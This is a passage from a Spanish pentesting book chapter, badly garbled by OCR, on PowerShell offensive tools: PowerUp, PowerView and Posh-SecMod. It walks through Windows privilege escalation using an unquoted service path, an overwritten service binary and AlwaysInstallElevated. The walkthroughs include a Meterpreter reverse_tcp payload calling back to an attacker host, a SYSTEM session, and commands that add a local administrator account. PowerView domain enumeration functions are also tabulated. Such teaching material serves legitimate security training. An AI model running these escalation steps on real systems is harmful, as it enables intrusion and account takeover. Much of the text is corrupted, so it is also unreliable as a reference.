l|>]  Checking  service  permissions 


Fig  .109:  Repurie  de  resultados  tic  las  funciones  dc  escalada  dc  PowerUp. 
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aplieacion  ddnde  contigurar  el  usuario  que  se 

ma  a  conftguracon  de  AlwayslnstallEUn>a,ed se  podra  realizar  una  escalada  de  privileKio  El  resto 

en  dersnmomTtosenaaTCar  V  ^  de  manera  sencilla’ las  cuales  P»«len  ser  u.ilizadas 

en  uertos  momentos  para  lanzar  servicios  que  utiiicen  binarios  manipulados. 

“MS' ^ete1'80""  ““  ^  PraP°rci0na  P°™rU>’-  A  K  muesira 


Funcion 

Descripcion 

Get-Unattendedlm  tall  Files 

Encuentra  ficheros  de  instalacion  desatendida  que  pueden  contener 
informacion  sensible 

Get -  Webconftg 

Chequea  los  ficheros  web.eonfig  en  busca  de  strings 

Get-AppUcationHost 

Chequea  el  pool  de  aphcaciones  y  las  contrasenas  de  los  directo- 
rios  virtuales 

Invoke-CheckLocct! Admin 

Chequea  si  el  usuario  es  realmente  un  administrador  local  de  la 
maquma.  Esk.  puede  ser  utilizado  para  pensar  en  un  bypass  L  AC 

Tahla  3.09:  Funciones  de  to  cafegoria  turns  dc  PowerUp. 


'  *  wtdiaua  ue  priviicgio 

tn  esla  prueha  do  concepto  se  Irauran  algunos  tallos  <|„c  puedep  encon, raise  on  .in  onion,.,  IIW„„ , 
los  cuales  pueden  provocar  la  escalada  de  privilegii,  El  escenorio  es  el  siguieme: 

-  Usuario  sin  priviiegio  y  acceso  a  una  PowerShelt  3.0. 

-  Fquipo  con  Windows  8. 

Scripts  de  PowerUp  en  el  equipo. 


que  es  un  proNcma?  El  problems  sc  produce  debido  a  que  e.  desarrollaZ  de  h  tre" 

.uviu°  que  en  muchas  ocasiones  se  ejecuta  con  el  maximo  de  privileges,  y  la  ruta  donde  se 

se  lancnedtinanr!n°  "T"  ^  C0'"illaS'  pr°V0Cando  «i«*  a'  P«ar  esta  ruta  a  xenvVe.v.e.ve  para  que 
I  n  ,  ...  ,  r  pueda  LX,stlr  confusion.  Esta  confusion  viene  dada  porque  Windows  busea  todas 

las  posibiltdades,  por  lo  que  va  probando  nombres  de  fichero  en  el  sistema 

^pdtnesSZund'rA  P/r°POne  T™0^  con  [a  ruta  C-i program  files  (x86)\Apple  Software 
orden:  ^meUpda,eAdmmexe-  Cua"d°  esta  ruta  es  pasada  a  services.exe ,  se  sigue  el  siguieme 


-  Se  lanza  C:\prograni.exe. 

Posteriormente,  se  comprueba  en  el  siguiente  espacio  C:\pmgramjiles  (x86)\Apple.exe. 
Despues,  continua  con  C:\pmgramfiles  (. x86)\Apple  Software.exe. 
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Asi  hasta  cncontntr  =1  binano.  qoc  en  ca»  be  — 


g  C  :\Usei>sSpgonzalez\i)esktop'sPuwerToo  is -waster  ^Powertipz  . 

I 

.  .  u  Path 

.  8T;;e.,e,n  File.  <x86>SRSUPP0.<Tsn. . . 

lobizen  plugin 

PS  c=sU..e»SPi,ooz.l.asl)«.M.»XP.w.rT..l.-».»t.rsP.».P«P>  <G.t-S.r.ieeUnW.t 


Fig.  3. 10:  Deleccidn  de  wi  servicio  sin  Camillas  en  la  rula  del  binano. 

S=;iSH:SESSE5§55 

y  sencilla  a  traves  del  modulo payload/windows/meterpretei /reverse _  /  ■  / 


ms  f  > 

>  use  payload/windows/mecerpreuer/ reverse  top 

£  payload ( .  ->  >  •«  «0K  192.163.56.101 

LHOST  =>  192.163.56.101  __  _t  4Xe  _f  Moblzen.e*e| 

ir.sf  payload  ( _  _ _  -  * - - 


3J}:  Creadon  del  binario  malidoso. 


E!  binario  nsoltante  se  coloca  en  la  rota  intermedia  ddnde  se  P“ed»  ^tr  ^  “°“ 

cn  enema  qoc  el pe***r  se  pnedc  eneontrar  n*.  to* :  noporf»  «cnb».  Tms  ^ 

puede  alojar  el  binario  en  alguna  ruia  mtermed.a  del  path  del  serv.c.o,  se  ae  p 
o  reinicie  el  servicio. 

En  este  »  se  ha  optado  configurer  el  modulo  moMWfer  <“  UaapMt  P"*  “m“r  el 
una  vez  se  haya  cjecutado  el  codigo  en  la  mdqmna  remota. 


rr.sf  exploit  (  -)  >  exploit 

Started  reverse  handler  or.  192.168.1.15:44*4 
Starting  the  payload  handler...  _ 

Sending  stage  (T7004S  bytes)  to  192.  *'‘~S  192. 168. 1.15: 62911)  at  : 

Meterpreter  session  1  opened  <192.-ow - b . 

15-06-09  21:15:30  +0200 

ir.etercretsr  >  getuid. 

Server  username:  NT  AUTHORITY! SYS - £H 
meterpreter  >  | _ _ .  - 


Fig.  3d  2:  Obtencion  del  maxima  privilegio  en  remota  a  traves  dt  Me  tup  refer. 
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lambicn  se  debe  hablar  sobre  debilidades  en  las  configuraciones  de  los  servicios  a  traves  de  los 
pei mi sos  de  los  binanos  de  estos.  Cuando  se  inslala  una  aplicacion  que  liene  algun  servicio.  y  el 
binario  que  este  lanza  esta  mal  configurado  en  lo  que  a  permisos  se  refiere.  se  puede  tener  un  agujero 
de  seguridad  importante.  b  J 

Supongase  un  ejemplo  en  el  que  el  servicio  A  lanza  un  binario  denominado pg  ctl.exe.  Este  binario 
tiene  permisos  por  delecto  que  permiten  que  un  usuario  con  menor  privilegio  pueda  sobrescribirlo. 
Si  se  genera  un  binano,  por  ejemplo  con  Melasploit,  y  se  anadc  codigo  arbitrario  a  este.  se  podria 
tomar  eJ  control  de  la  maquina  en  remoto  cuando  se  lance  el  servicio. 

Para  esta  segunda  prueba  de  concepto  se  utiliza  la  funcion  Cet-ServiceEXEPerms,  la  cual  detectara 
bs  binanos  que  no  t.enen  los  permisos  bicn  conftgurados.  En  el  ejemplo  se  puede  visualizar  como 
la  funcion  devuelve  que  el  binano  MobizenService.exe  tienc  una  configuracion  de  permisos  erronea 
por  lo  que  puede  ser  sobrescrito  por  el  usuario. 


>S  C:\Usei*s\pgonzalez\Desktop\PowerTools-maste»>\Pouei*Up>  Get-SeruiceEXEPerm 

lerviceNane  Path 

\ Pro gram  Files  <x86>\RSUPP0RT\M _ 


f'ig.  3. 13.  Detecc ion  de  binario  con  permisos  mat  configu rado s. 


rm  esta  °“sion  el  binano  se  generara  con  las  fiinciones  de  PowerUp  Write-ServiceEXE  y  Write- 
wr  Para  poder  personalizar  la  mstruccion  a  ejecutar  se  utiliza  la  siguiente  instruccidn 

ine-Sei  i  icetXECMD  -SernceName  ‘Mobizen  plugin  "-CMD  "net  user pablo  123abc  /add && 
net  loealgroup  administradores pablo  /add". 


PS  C - \U^ei  -\pgonzale2\Deshtop\Pooei'Tools-naster\PouerUp>  Ge t -Service EX EPerri 

SeruiceName  Path 


Mobizen  plugin  C:\Progran  Files  <x86>\RSUPPORT\M. 


loealgroup  admnistradores  hacked  /add”  ”  ^dd  8r&  net 
cd  123abcy  Mobizen  plugin^  with  cusotm  connand  'net  user  hack 
PSCC-\Usli^!  Files1<x8^>SP“P^RT\MobizenService\MobizenService  exe^*"  t0 

[£S_C^Usei.s\pgonZaleZ\Desktop\Po,.,erTools-,,aSter\Powe^Up>  C _ 


Fig.  3. 14:  Creadon  de  binario  personalizado  con  instruccidn  maticiasa. 


SZrn  2?  A,  mOV  “  b,n"°  w»h*1  *  «» ■>**.  y  K dejari  como  binario 

nut-  h  w  T  °,a  tOCa  arranCar  d  Servicio’  °  Pararl°  si  estuviera  arrancado,  y  para  ello  se 
t  .Cr|  serv^s-msc-  Una  vez  ejecutado  el  servicio,  este  lanzara  el  binario  sobrescrito  v 
ejecutara  la  mstruccion  prevista. 

COm°  ”  h°  Cr“d°  un  “ua™ <taon,tado  hacked’ 01  cual  !*«»« 
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Nombre  Nombre  ccmpleto 

Administrador 
hacked 
^4,1  In  v'rta  do 


Propiedades:  hacked 


Descripcicn 

Cuenta  irrtegrada  para  la  administ.. 

Cuenta  inteqrada  para  el  acces^^ 

-  9 


General  Miembro  de  Peifii 


1 


Miembro  de: 


^  Administradores 
Usuarios 


13 - 1  —  l  /5.  CmM*)„  Je  1  auario  v  adidan  al  grupo  admimslmdores. 


P„C-  Conflguracion  erronea  cn  el  registro  que  permite  la  »b«enci6..  dc  privilegin 

H  mmnrometer  un  entomo  Windows. 

En  esta  prueba  de  concepto  se  traia  un  a  o  con  <-  |'l‘e  Drivilegio  siempre  y  cuando  se  cumplan 
Esia  configuracion  erronea  puede  provocar  la  escatada  de  pnv.leg.o,  P  y 

las  condiciones. 

El  escenario  es  el  siguiente: 

-  Usuario  sin  privilegio  y  con  acceso  a  una  PowerShell  3. 0. 

-  Equipo  con  Windows  H. 

.  Scripts  de  PowerUp  en  el  equipo. 

En  .1  regi*.  de  m^s  exislcn  dos  nuns, »mo  «  U  —  55 

el  privilegio  con  el  que  se  ejccutan  los  paquetes  c  e  tns  ,/  £n  esta  rU(a  se  puede 

WCV"-  „  configuration 

encontrar  una  clave  denominada  l/n  .  .  valor  es  0.  Estara  incorrectamentc 

no  es  vulnerable.  Estara  correctamente  configura  a  s  y  cURRENT  USER\Soft*an 

configurada  si  existe  y  su  valor  cs  1.  La  ruta  en  HKCU  cs  HKETJ.UXK  _ 

Policies\Mic>vsoft\WindowsVnstaIler. 

a  valor  1 .  . 

Al  ejeema,  la  faeidn  Ce,-R^ys,mame.  ’  P««* 

RegAlwaysInslaUEIevated -Verbose. 


Cctpimh  III  PowerShell  pum:  El  arte  del  pentesting 
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llElevated  -Uerbose  ktop\PowerTools  mastei-\PowerUp>  Get-RegAlu 

DETALLADO:  H  Xinhua  1:  1 
DETALLADO:  HKCUval:  1 

DETflLEflDO:  Always I nstallEleoated  enabled  on  this  machine! 


/'/£  J.  16:  Detection  Je  configuracion  erronea  de  Ahvayslnsiall Elevated. 


Una  vez  detectada  la  contigurac.cn  erronea.  el pentester  tiene  claro  que  puede  lanzar  un  paquete  MSI 
do  'HStalacion  con  el  maximo  privilege,  aunque  su  usuario  no  renga  privilegio.  La  funcion  IVrite- 
LserAck/MSI  perm.te  crear  un  archive  MSI.  el  cual  contiene  una  aplicacion  que  mostrara  un  pa  el 
con  el  que  se  puede  crear  un  usuario,  indicando  su  contrasena  y  el  grupo  al  que  perteneeera 


Tras  ejecutar  Write-UserAcidMSI  sc  podra  utilizar  el  paquete  MSI  para  crear  un  nuevo  usuario 
administrador  en  el  equtpo.  Como  se  puede  visualizar  en  la  imagen.  el  panel  de  la  apHcae^n  es 
sencillo  y  In  elevacion  de  privilegio  es  todo  un  exito. 


User  Add 


_  □ 


Username 

backdoor 


Password 
password  123 


jroup 


|  ^dmjnistradjjres 


Create 


h  '8‘  'J7:  Clvacw"  <k’  usuario  a  irmis  de  aplicacion  Umzucia  am  un  /wqueic  MSI 


PowerView 

eSUn  C?njunto  de  herramientas  escritas  en  PowerShell  para  obtener  conoeimiento  de  la 
S  ,ted„“Zn  £  'WW  contiene  an  eonjamo  de  luneiones  de 

*>  algunas  Jelo^dS  Wfe  ™  P»™  Never  , 

vari“  “'“"ciones.  incluyendo  mpor,  de  la  herremieraa 

tear  janes  qne  Ibman  n  .  T  'i“  P1""'™  m  la  reA  Mds  "dd“tt  «  deseribiran  las 

9  ni1an  Pmxe' WeM*  y  se  Podran  detectar  miles  de  usos  en  un  pentesting. 

““  "’T1"”  “  pue<1'  Cjemor  'n!itn|ccidn  impon-moduU 

*l'c»,«cl  flehero^  °Pa°"  S'™  C1K"'°'  PmSI’C"  ~e"‘'  l’yP°S*  >  «”  »  “si™ 
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Pentesting  con  PowerShelt 


C  apilulo  III.  PowcrShell  puro:  El  one  del  pentesting 


PowerVI «...  clasiflcado  o>  di.ten.es  categori*.  agrnpnndo  ftneionaUdade,  qua  proporcion, 
en  dichas  ca.agorias.  Las  ca.egor.as  que  comprenden  djrmmwck  son. 

-  Funcionalidades  de  red. 

.  Las  funciones  t tser-hunling. 

.  Funciones  relacionadas  con  las  relaciones  de  confianza  en  donumos. 

Metafunciones  y  otros. 


A  continuacion  se  detallan  las  funciones  proporcionadas  en  la  categona  tuneionalidadts  dc  icd. 


Nombre 


Descripci6n 


Get-NetDomain 


“Se  lista  el  nombre  de  dominio  actual,  los  contro.adores  de 
Hmninio  existentes,  el  PDC,  el  RID  v  cl  mode  de  domm.o 


Get-NetDomainContml lew 


Get-NetCurrenl  User 


Se  lista  informacion  sobre  los  distintos  controladores  dominio. 
Muestra  la  version  del  sistema  operative  de  este  domain 
controller,  la  direccion  IP.  la  sincronizac.on  horana,  las 
particiones.  etcetera 


Muestra  el  usuario  actual  en  la  red 


Get-NetUser 


Get-NetUserSPSs 


Get-NetOUs 


Get-NetG  UIDOUs 


Muestra  todos  los  objetos  de  tipo  usuario.  Proporciona 
informacion  sobre  todos  los  usuarios  del  dominio.  Inlormacion 
como  el  nombre.  apellidos,  email,  categona  del  abpio  homed, at. 

veces  que  se  ha  logado.  objected,  adspath,  .dent.ficador del 
gi  upo  primario.  SID.  etcetera.  Es  realmente  util  esta  inlormacion, 
en  u na  fasc  de  recopilacion  de  intormacion  del  dommio 


VI  i  Cl  I  in  - - - r 

Lista  los  principles  nombres  de  servicio  de  los  usuarios  __ 
Lista  las  unidades  organizativas  del  dommio  en  nomenclatun. 
Active  Directory 


Encuentra  OUs  enlazadas  a  un  GUID  especifico^ 


L_llVUVIItl  n  - -  - - - 

AppHp  i in  usuario  local  o  de  dominio.  siempre  que  sea  postbto 


Noinbre 

Descripcion 

Get-N  et  Local  Sen*  ices 

Lista  un  conjunto  dc  servicios  que  se  estan  ejecutando  sobre  una 
maquma  remota  o  un  listado  de  maquinas 

Invoke-NetGroup  User  Add 

Anade  un  usuario  a  un  grupo  local  o  dc  dominio  especifico 

G ef-NetComp  liters 

Consigue  un  listado  de  cquipos  y  servidores  en  el  dominio 

Get-NetFi  leSet  n  'ers 

Proporciona  un  listado  de  servidores  de  archivos  utilizados  por  los 

actuates  usuarios  del  dominio 

Ge/-Ne/Share 

Indica  informacion  de  recursos  compartidos  de  un  equipo  de  la 

ic  .  e  debe  ulilizar  el  parametro  hostname  para  indicar  el  nombre 

del  equipo 

Get-NetLoggedon 

Lista  los  usuarios  logados  con  actividad  en  un  sen  idor  especifico 

Get-NetSessions 

Lista  sesiones  activas  sobre  un  servidor  especifico.  indieando  que 
usuario  es  el  que  ticne  dicha  sesibn 

Get-NetFUeSessions 

Devuelve  la  combinacion  entre  la  ejecucion  de  Get-NetFiles  y  d 
coniando  Get-NetSessions.  En  caso  de  que  alguno  no  devuelva 
resultados.  el  resultado  sera  nulo 

G  et- NetConnections 

Lista  las  conexiones  activas  mostrando  los  recursos  compartidos 

de  un  sen  idor  o  maquina  cspecifica 

Get- Net  R  DP  Sessions 

- Llstj  las  sesiones  RDP  activas  sobre  una  maquina  concrcta 

Get-Net  Files 

Muestra  el  listado  de  ficheros  abiertos  sobre  una  maquina 

Get-Net  Pi  veesses 

Muestra  cl  listado  de  procesos.  con  el  propietario  del  mismo 
sobre  una  maquma  especifica.  pudiendo  ser  una  maquina  remota 

Tahiti  3.  It):  Funcionalidades  tie  red  de  Power  lien 


un  “  T  -  T  "  en  ,a  rod  3  aud,tar-  Son  funcionalidades  que  per. 
unconoc.rn.ento  amplio  sobre  el  entomo  en  el  que  el  pen, ester  se  encuentra. 

A  continuacion  sc  detallan  las  funciones  proporcionadas  en  la  categona  user-hunting : 


,nv°ke-StealthUserHunter 


Encuentra  los  servidores  dc  ficheros  utilizados  en  los  directories 
de  los  usuarios  y  chequea  las  sesiones  sobre  cada  servidor  de 
archivos 
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Norabre 

Description 

Invoke- VserPmcessHun  ter 

Eneuentra  los  procesos  que  se  ejecutan  en  las  maqumas  del 
/trim  in  in  que  corren  bajo  el  privilegio  de  un  usuano  coneieto 

Invoke-PwcessH unter 

Enumera  procesos  con  un  notnbre  espedfico  que  se  enci 
corriendo  en  di versus  maquinas 

Invoke-UserEvent  Hunter 

Enumera  eventos  de  logon  sohcitando  a  los  domain  controllei 
esta  informacion 

,  r  ...I . 

A  continuacion  se  detallan  las  funciones  proporcionadas  en  la  categona  relaaoncs  de  .onfianza  en 
dominios: 


Invoke-FindAllUserTrustGroups 

Invoke-FindGroupTnistUsers 


Invoke-FindAIIGroupTmslUsers 


Jnvoke-EnumerateLocalTrustGroups 

Invoke-EniimerateLoctilTrustGroiip 

sThreoded 

Invoke-  XlapDomain  Ti  lists 

Invoke-MapDomainTruslsLDAP 


Mapea  todos  los  domain  trusts  y  enumera  todos  los 
usuarios  que  estan  en  grupos  fuera  de  su  pnneipal 
dominio _ 

Enumera  todos  los  miembros  de  un  grupo  de  clom.n.o 
v  eneuentra  los  usuarios  que  estan  luera  del  donunio 
ronsultado.  Se  debe  indicar  un  dominio 


Mapea  todos  los  domain  trusts  y  enumera  grupos  con 
usuarios  luera  de  su  principal  doming 


Enumera  miembros  del  grupo  de  administradorcs 
cruzados  _ 


Version  con  threads  de  Invoke- 

EnwnerateLocalTrustGroups 

Se  intentaconstruir  un  mapa  relacional  de  todos  los 
domain  trusts _ 

Se  intenia  construir  un  mapa  relacional  de  todos dos 

domain  trusts  milizando  GepNetDomain TntsltdJW 


Table 12  Funcionalidades  de  domain  trust  de  PouerView. 
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A  continuacion  se  detallan  las  metaftinciones  y  el  resto  de  funciones  que  se  agrupan  en  la  categona 
otros  de  Power  View: 


Nonibre 

Descripcion 

Invoke-Netview 

Es  un  poi  t  de  la  herramienta  netview.exe  utilizando  las 
funcionalidades  Get-Net *  Eneuentra  maquinas  sobre  un 
dominio  local  y  ejecuta  varios  metodos  para  enumerar 
recursos  compartidos.  Ademas.  permite  visualizar  sesiones 
activas.  Interesante  comando  para  la  fasc  de  descubrimiento 
de  red 

In  voice -Net  viewThreaded 

Version  con  threads  de  Invoke-Netview 

In  voke-S hare  Finder 

Eneuentra  y  enumera  los  recursos  compartidos  de  los 
equipos  que  forman  parte  de  la  red.  Utiiiza  tecnicas  no 
estandar  para  ello 

In  \  ’okediareFinder  Threaded 

Version  con  threads  de  / nvoke-ShcnvFinder 

In  voke-FileFinder 

Eneuentra  archivos  potcncialmente  sensiblcs  sobre  los 

equipos  de  un  dominio  local 

Invoke- h  He  Finder  Threaded 

Version  con  threads  de  Invoke-FUeFinderThreaded 

In  \  oke-dLocalA  dmitiA  ccess 

Eneuentra  maquinas  en  las  que  el  usuario  que  ejecuta  el 
comando  tiene  acceso  como  administrador  local 

Invoke- 

Local,  l  dm  in  A  cces  Threaded 

Version  con  threads  de  Invoke- 
FindLocalAdminAccesThreaded 

/  nvoke-  UserFieldSeareh 

Se  rcaliza  una  busqueda  de  usuarios  a  traves  de  un  campo, 
como  por  ejcmplo  su  nonibre.  Es  necesario  utilizar  el 
parametro  term  para  indicar  el  termino  que  se  quiere 
matchear  y  el  parametro.  field  para  indicar  sobre  que  campo 
se  realiza  la  busqueda  del  termino 

Imoke-ComputerFieldSearch 

Similar  al  comando  Invoke  UserFieldSeareh.  con  la 

difcrencia  de  que  las  biisquedas  se  rcalizan  sobre  maquinas 

Get-Pxp/oitableSvstems 

Eneuentra  sistemas  que  parecen  vulnerables  a  algunos 

exploits  conocidos.  El  detalle  de  los  exploits  que  se  pueden 
utilizar  se  eneuentra  comentado  en  el  codigo  fuente  de 
PowerView 

Get-  LA  PSP  ass  words 

Lista  contrasenas  LAPS.  Local  Administrator  Password 
Solution ,  para  cada  cuenta  de  equipo 
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Nombre 

Description 

In  voke-Hos  tEnwn 

Se  ejecuta  todos  los  chequeos  disponibles  para  enumerar 
recursos  compartidos,  objetos  de  tipo  usuarios  logados. 
sacar  informacidn  de  directorio,  enumeration  de  grupos 
locales  y  usuarios.  etcetera.  Todo  esto  ind.cando  con  el 
parametro  HostName  la  maquina  sobre  la  que  se  lanzara  este 
todo  en  uno 

Invoke-EnumerateLocalAdmins 

Enumera  los  miembros  del  grupo  admimstradores  de  las 

maauinas  del  dominio,  siempre  que  se  pueda 

Invoke- 

|  EmimerateLocalA  dmins  Threaded 

Version  con  threads  de  Invoke-numeraLocalAdmins 

Get-Host IP 

Resuelve  un  nombre  de  maquina  a  una  d.recc.on  IP.  Esto 
puede  ser  bastante  util  para  conocer  las  d.recciones  IP  de 
las  m&quinas  del  dominio.  Si  no  se  introduce  el  parametro 
I^mrnae.  se  coee  oor  defecto  la  maquina  local 

Set- Mac  Attribute 

Permite  modificar  los  atributos  de  un  lichero 
nn  «irr*hivn  local  a  una  ubicacion  remota 

Invoke-CopyFile 

Test-Server 

Get-UserPropertics _ 

Prueba  la  conectividad  con  una  maquina  especifica 

]  j5ta  1?«  pmpiedades  para  un  usuario  especifico 

Get-ComputerProperties 

Get-Last  LoggedOn 

Lista  las  propiedades  para  un  equipo  especifico 

Indica  el  ultimo  usuario  logado  en  el  equipo  indicado 

Get-UserLogonEveitts 

Devuelve  eventos  de  logon  de  una  maquina  especifica, 
siempre  y  cuando  se  tenga  acceso 

Get-UserTGT Events 

Devuelve  eventos  de  peticionesTGl  en  una  maquina 
especifica 

Invoke-CheckLocalA  clminA  ccess 

Chequea  si  el  usuario  actual  tiene  acceso  como 

administrador  local  en  una  maquina  especifica 

In  voke-Search  Files 

Realiza  busquedas  sobre  un  path  local  o  remoto  para 
encontrar  fichcros  con  term i nos  concretos  en  su  nombre. 
Este  comando  es  util  para  realizar  busquedas  de  fichcros 
en  las  maquinas  del  dominio.  Se  debe  indicar  el  parametro 
terms 

Convert-NameToSid 

Convierte  un  nombre  dc  usuario  o  nombre  de  grupo  a  un 
Sin  Hi»hp  indicar  el  parametro  name  - . 

Convert-SidToN aine 

Convierte  un  SID,  Security  Identifier ,  a  un  nombre  de 
usuario  o  nombre  de  grupo.  Se  debe  indicar  cl  paratne 
SID  

Tabla  3.13:  Metafimciones  y  oiras  funciones  de  Power  hew. 


C  apitulo  ///,  PowerShell  puro;  El  arte  del  pentesting 


CX,raCr  S“t”“„aenTen  " 

laceral  a  .raves  de  rZsTe^sTp^mim  "^T"" 

para  una  auditoria  en  la  red  corporativa.  P  L  fonnac,on  val,osa 


PoC:  Resumen  de  Power  View 

zTr uti,izados  en  cuaiquier —• « *■*» 

inuy  intcresantes.  Hay  O^we^en^iwnte^^tes^ron^bi^enTas^u^e^yww/CT/^seencuen^re8 
pueden  hacer  que  se  nccesite  la  ejecucion  de  una  u  otra  funcionalidad 

Un°  de  los  Primeros  comandos  y  que  mas  informacion  puede  devolver  es  Get-NetUser  f«, 
lunc.onal.dad  proporc.ona  informacion  sobre  todos  los  usuarios  del  dirZ  ,  •  Esta 

puede  encontrar  gran  cantidad  de  correos  electronicoe  SID  unid  .dr.-  L  °n°  aCtIV°’  ?°r  °  qUe  se 
">-»»■  de  con, rased,,  dp„,»  de ‘Z5ZSZ?  * 

viceversa  es  realmente  sencillo.  1  3  nomhre  usuario,  y 


SfSid  ^':''^se^s^P3'onzal.,^Peshtop\Po,re,tTooIs-BiasC.e\Polw,-Uierj>  Ceov,rt-W, 

S-l-5-21 -329&2i&i  74-  -  .. 

CrNOsepsSpgonzaiezNOesptopNPouei-iooXs-oastepNPoMepOieMP  Conwept-SidloHan 


SI*D?°S-l-S-21-329^°§?^-  *°S  s iffuien tes?*1^ 16 "  de  COmandos 

i<'^^T.N'I>abl0 'Gonzalez  111? 

j^.xuSBTOSn0n2aie8NDesktop^OTOrTools_|||aste^pnwrf|^^ 


F'g.  3.18:  Conversion  de  SID  a  nombre  de  usuario  y  viceversa 


=sE“"""~s=s; 

W: *"*’ "  C“al  "art  fi"ro  “bre "»  «c.™»  compartidos 
uestran,  md.cando  solo  los  que  el  usuario  que  ejecuta  el  comando  tiene  acceso. 
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Pcntesling  con  PawerSItel^ 


Fig.  3.19:  Rtcolectidn  de  information  con  Jnvoke-Retvtew. 


,  . •  .  tn>.  mblas  anteriorcs  es  Invoke- 
Uno  de  los  comandos  importanies  que ^  encontrar maquinas en el  dominio en las 

PindLocalAdminAccess.  Grac.as  a  este  coma  P  ^  administrador  si  una  de  estas  maquinas  es 

^ y  por  ejcmpl°* cjccutar  un  proceso  como  una 
Melerpreter  e  ir  ganando  mas  funcionalidades. 


En  la  mayoria  de  los  cases,  un  LlSUari°  ^^rnas  como  finc^n  prhac.pal  servir  archives 

un  usuario  normal  lambien  tenga  el  maxu  P '  -  maquinas  e  indicara  que  el  usuano 

^  ^  C°  13 

imagen. 


DETALLADO:  t*3  Enunerating  dC03.  - 

DETALLADO:  1*3  server  PllP-56.: 

DETALLADO:  1*1  Enumerating  pup-12. 

DETALLADO:  1*3  Enumerating  |**  DC02  __ 

jirTAi  i  ft  no:  [*]  Enunerat  ing 
nFTALLADO:  1*3  Enumerating  server 
nrTALl.A DO [*3  Enumerating  serve 
DETALLADO:  1*1  Enumerating  servei 
DFTALLADO:  1*1  Enumerating  serve 
DETALLADO:  t*l  Enumerating  server 
^™M.SdO:  M  Current  user,  n  ( 

.local 


Server. 


<11  of  24) 


\Pablo 


<12  of  24) 

_ -  <13  of  24) 

_  <14  of  24) 

_  15  of  24) 
local 

ical  <1?  of  24) 
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:al  <19  of  24) 
ical  <20  of  24) 
Gonzalez’  l<as  local  admin 
—  242) 


l»j  Enumerating  server 
r*]  Enumerating  server 
[*]  Enumerating  server 
-  '  Enumerating  server 


DETALLADO 
DETALLADO 
DETALLADO 

DETALLADO:  [+1  Current  user 
access  on 


):  l>] 


. local 


.local  < 


.  <21  of  24) 
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local  <24  of  24) 
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Fig.  3.30:  EnconmJS'""*  ddnde  el  usuarto  none  acceso  de  adminis, radar. 
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HI  ultimo  comando,  cl  cual  hace  un  resumen  global  de  todos  los  checks  es  Ittvoke-hostemrm.  Con 
esrc  comando.  indicando  el  hostname  de  una  maquina  del  dominio  sc  obtiene  gran  canlidad  de 
informacion.  Se  recopilan  los  grupos  de  la  maquina.  los  usuarios  administradores.  los  servicios 
existentes,  los  recursos  compartidos  existentes.  los  procesos  que  ejecutan  en  la  maquina.  Ios  usuarios 
logados  en  la  maquina.  etcetera.  Information  niuy  interesante  y  que  ayuda  a  conocer  mas  detalles  y 
posibles  puntos  debiles  en  las  maquinas  del  dominio. 


4.Posh-SecMod 

Posh-SecMod  es  un  modulo  para  PowerShell  v3,  el  cual  proporciona  una  coleccion  dc  funciones 
que  pueden  ser  utiles  en  el  dia  a  dia  del  pentester.  Este  conjunto  de  modulos  ha  sido  escrito  por 
Carlos  Perez .  quiza  mas  conocido  como  Dark  Operator.  Posh-SecMod  se  puede  descargar  desde  su 
repositorio  de  Githuh  https://gitlnih.com/darkoperator/Posh-SeciYfod 

Las  funcionalidades  que  proporciona  este  modulo  se  enumeran  a  continuation: 

-  Discover}-.  Funciones  que  permiten  realizardescubrimiento  en  la  red.  Se  pueden  encontrar 
funciones  tipicas  de  etapas  6e  footprinting  como  puede  ser  el  Whois,  funcionalidades  de  red 
para  obtener  informacion  de  un  servidor  DNS.  enumerar  un  rango  de  direcciones  IP.  eseaneos 
de  puertos  sobre  maquinas  remotas.  eseaneos  a  traves  del  protocolo  ICMP  o  eseaneos  ARP 
etcetera. 

-  Utilities.  Este  modulo  proporciona  diferentes  funciones  que  permiten  al  pentester  desde 
la  descarga  de  ficheros  en  diferentes  direcciones  URL.  manejo  de  archivos  comprimidos. 
gestion  de  hashes  en  ficheros  con  diferentes  algoritmos  como  MD5,  SI  1A I .  SHA256. 
SHA384,  SHA512.  obtener  la  ultima  version  de  las  herramientas  de  Sysinternals.  Como  se 
puede  ver  es  un  modulo  con  diferentes  utilidades  que  en  un  momento  pueden  ayudar  durante 
la  realization  de  un  pen  test  ing. 

-  Registry.  Este  modulo  proporciona  una  coleccion  dc  funciones  que  pcmiile  al  usuario 

mampular  el  registro  de  los  equipos  de  forma  remota  a  traves  del  lenguaje  de  instrumentacidn 
WML 

-  Audit.  Este  modulo  proporciona  funciones  enfocadas  a  la  auditoria  de  sistemas. 
Funciones  que  permiten  enumerar  los  tipos  desesiones  logadas.  rccuperar  informacion  sobre 
las  maquinas  del  direclorio  aclivo,  recuperar  informacion  sobre  los  usuarios  del  directorio 
activo.  recuperar  mas  detalles  sobre  el  directorio  activo.  etcetera. 

PostExploitation.  Este  modulo  presenta  funciones  que  ayudan  al  pentester  a  realizar 
Ureas  de  post-explotacion.  Estas  tareas  son  vilales  para  terminar  con  cxito  un  pettiest  y  se 
pueden  encontrar  funciones  que  permitan  transtormar  codigo  de  PowerShell  en  basc64  cl 
cual  se  puede  ejecutar  desde  la  linea  de  comandos.  funciones  que  ayudan  a  comprimir  el 
tamafio  del  script,  funciones  que  hacen  la  descarga  de  un  script,  un  binario,  y  ejecutan  su 
contenido  de  forma  encodeada.  Ademas.  la  posibilidad  de  ejecutar  procesos  remotos  a  traves 
de  » AfL  realiza  un  ditmpeo  de  hashes  del  sistema.  devolver  una  shell  inversa  a  otra  maquina 
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„  ,  ...  TrP  reali2a  una  copia  del  fichero  ntds.dit,  ut.hdades  para 

configurada  para  ello  a  Iraves  de  1CP.  r  ^  1^^  como  ge  puede  entender  Iras 

transformar  contemdo  a  hexadecimal  ’  .  n  ,a  hora  de  no  disponer  de  otras 

la  enumeracion  de  aceiones,  es  muy  mteresante  y 

herramientas  en  el  sisteitia.  ficheros  XML  de 

.  Parse.  Este  modulo  proporciona  ftmctones  para  reahzar  pa,  sea 

Nmap  o  DNSRecon.  utilizadas  para  interactuar 

-  Database.  Este  mddulo  proporciona  UnC'°"^nsu[tas  contra  una  base  de  datos  SQLite. 
con  bases  de  datos.  pudiendo  conectar  >  “>  tr>tar  information  masiva  que  se  pueda 

rru  — — ■— ** 
:nc:rr"  pzi, — "r.s 

herramientas  y  servicios  simplificando^su  integraci^  ^  ^  convertido  en  modulos  propios 
de  PowerShell.  En  la  version  1.3  de  os  i-  ec.  ^  posh-VtrnsTotal,  con  sus 

con  los  nombres  coleccion  de  ensamb.ados , 

repositories  de  GnHub  propios.  Posh  .  •  P  -  famosos.  Posh-Metasploit 

